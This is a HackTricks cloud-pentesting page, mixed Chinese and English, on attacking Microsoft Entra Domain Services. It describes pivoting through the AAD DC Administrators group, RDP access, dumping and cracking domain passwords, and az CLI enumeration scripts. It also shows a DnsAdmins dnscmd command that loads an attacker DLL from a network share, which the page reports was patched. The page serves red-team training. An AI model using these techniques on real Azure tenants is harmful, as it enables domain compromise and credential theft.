Az - Microsoft Entra Domain Services

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

域服务

Microsoft Entra Domain Services 允许在 Azure 中部署 Active Directory,而无需管理 Domain Controllers(实际上你甚至无法访问它们)。

其主要目标是允许你在云中运行无法使用现代认证方法的遗留应用,或在你不希望目录查找总是回到本地 AD DS 环境的场景。

Note that in order to synchronize the users generated in Entra ID (and not synchronized from other active directories) to the AD domain service you need to change the password of the user to a new one so it can be synchronized with the new AD. Actually, the user isn’t synchronized from Microsoft Entra ID to Domain Services until the password is changed.

Warning

即使你创建了一个新的 active directory 域,你也无法完全管理它(除非利用某些错误配置),这意味着默认情况下例如你不能直接在 AD 中创建用户。你需要通过 从 Entra ID 同步用户 来创建它们。你可以选择同步所有用户(即便是那些从其他 on-premise AD 同步过来的)、仅同步云用户(在 Entra ID 中创建的用户),或者甚至 进一步筛选

Note

总体来说,由于对新域的配置缺乏灵活性,且 AD 通常已经部署在本地,这并不是 Entra ID 与 AD 之间的主要集成方式,但了解如何攻破它仍然很有趣。

Pivoting

生成的 AAD DC Administrators 组的成员在加入到托管域的域联接 VM 上被授予本地管理员权限(但在域控制器上除外),因为他们被添加到本地 administrators 组。该组的成员还可以使用 Remote Desktop 远程连接到域联接的 VM,并且他们还是以下组的成员:

  • Denied RODC Password Replication Group: 这是一个指定哪些用户和组的密码不能在 RODC(Read-Only Domain Controllers)上缓存的组。
  • Group Policy Creators Owners: 该组允许成员在域中创建 Group Policies。不过,其成员不能将组策略应用到用户或组,也不能编辑现有的 GPO,因此在此环境中并不太有用。
  • DnsAdmins: 该组允许管理 DNS 设置,过去曾被滥用以 escalate privileges and compromise the domain,但在本环境中测试该攻击后,发现该漏洞已被修补:
dnscmd TDW52Y80ZE26M1K.azure.hacktricks-training.com /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll

DNS Server failed to reset registry property.
Status = 5 (0x00000005)
Command failed:  ERROR_ACCESS_DENIED     5    0x5

Note that to grant these permissions, inside the AD, the group AAD DC Administrators group is made a member of the previous groups, and also the GPO AADDC Computers GPO is adding as Local Administrators all the members of the domain group AAD DC Administrators.

注意,为了授予这些权限,在 AD 内,组 AAD DC Administrators 被加入到先前的组中,且 GPO AADDC Computers GPO 将域组 AAD DC Administrators 的所有成员添加为本地管理员。

Pivoting from Entra ID to an AD created with Domain Services is straightforward, just add a user into the group AAD DC Administrators, access via RDP to any/all the machines in the domain and you will be able to steal data and also compromise the domain.

从 Entra ID 横向移动到使用 Domain Services 创建的 AD 很简单,只需将用户添加到组 AAD DC Administrators,通过 RDP 访问域中的任意/所有机器,就能窃取数据并且能够 compromise the domain.

However, pivoting from the domain to Entra ID is not as easy as nothing from the domain is being synchronized into Entra ID. However, always check the metadata of all the VMs joined as their assigned managed identities might have interesting permissions. Also dump all the users passwords from the domain and try to crack them to then login into Entra ID / Azure.

然而,从域向 Entra ID 横向移动并不容易,因为域中的内容并不会同步到 Entra ID。不过,务必检查所有已加入 VMs 的元数据,因为其分配的 managed identities 可能具有有趣的权限。另外,dump all the users passwords from the domain 并尝试破解这些密码,然后登录 Entra ID / Azure。

Note

Note that in the past other vulnerabilities in this managed AD were found that allowed to compromise the DCs, like this one. An attacker compromising the DC could very easily maintain persistence without the Azure admins noticing or even being able to remove it. 请注意,过去在该 managed AD 中发现过其他漏洞,这些漏洞允许 compromise the DCs, like this one。攻击者一旦 compromising the DC,就可以非常容易地保持持久性,而 Azure 管理员可能不会注意到甚至无法将其移除。

Enumeration

# Get configured domain services domains (you can add more subs to check in more subscriptions)
az rest --method post \
--url "https://management.azure.com/providers/Microsoft.ResourceGraph/resources?api-version=2021-03-01" \
--body '{
"subscriptions": [
"0ce1297c-9153-425d-3229-f51093614377"
],
"query": "resources | where type == \"microsoft.aad/domainservices\"",
"options": {
"$top": 16,
"$skip": 0,
"$skipToken": ""
}
}'

# Get domain configuration
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/<domain-name>?api-version=2022-12-01&healthdata=true"
## e.g.
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.hacktricks-training.com?api-version=2022-12-01&healthdata=true"

# Based on the VNet assigned to the domain services, you can enumerate the VMs in the domain

subscription_id="0ce1297c-9153-425d-3229-f51093614377"
vnet_name="aadds-vnet"

# Retrieve all VMs in the subscription
vm_list=$(az vm list --subscription "$subscription_id" --query "[].{Name:name, ResourceGroup:resourceGroup}" --output tsv)

# Iterate through each VM to check their VNet connection
echo "VMs connected to VNet '$vnet_name':"
while IFS=$'\t' read -r vm_name resource_group; do
nic_ids=$(az vm show --subscription "$subscription_id" --name "$vm_name" --resource-group "$resource_group" --query "networkProfile.networkInterfaces[].id" --output tsv)

for nic_id in $nic_ids; do
subnet_id=$(az network nic show --ids "$nic_id" --query "ipConfigurations[0].subnet.id" --output tsv)

if [[ $subnet_id == *"virtualNetworks/$vnet_name"* ]]; then
echo "VM Name: $vm_name, Resource Group: $resource_group"
fi
done
done <<< "$vm_list"

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks